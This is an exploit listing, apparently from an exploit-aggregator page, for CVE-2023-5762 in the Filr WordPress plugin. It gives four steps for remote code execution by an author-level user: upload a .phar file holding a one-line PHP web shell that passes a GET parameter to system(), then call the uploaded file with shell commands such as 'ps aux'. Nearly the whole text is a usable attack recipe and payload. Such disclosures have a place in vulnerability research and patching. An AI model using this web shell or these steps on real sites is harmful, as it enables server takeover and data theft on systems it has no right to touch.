Exploit for Filr – Secure document library < 1.2.3.6 - Author+ RCE via file upload with phar ext CVE-2023-5762

Name: Exploit for Filr – Secure document library < 1.2.3.6 - Author+ RCE via file upload with phar ext CVE-2023-5762
Rating: 5 (99 reviews)

2023-11-13 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:6AD99725-ECCC-4B61-BCE2-668B62619DEB
1) Go to main dashboard of plugin http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload file with extention "phar" and malicious code inside, like <?php system($_GET['cmd]'); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and do RCE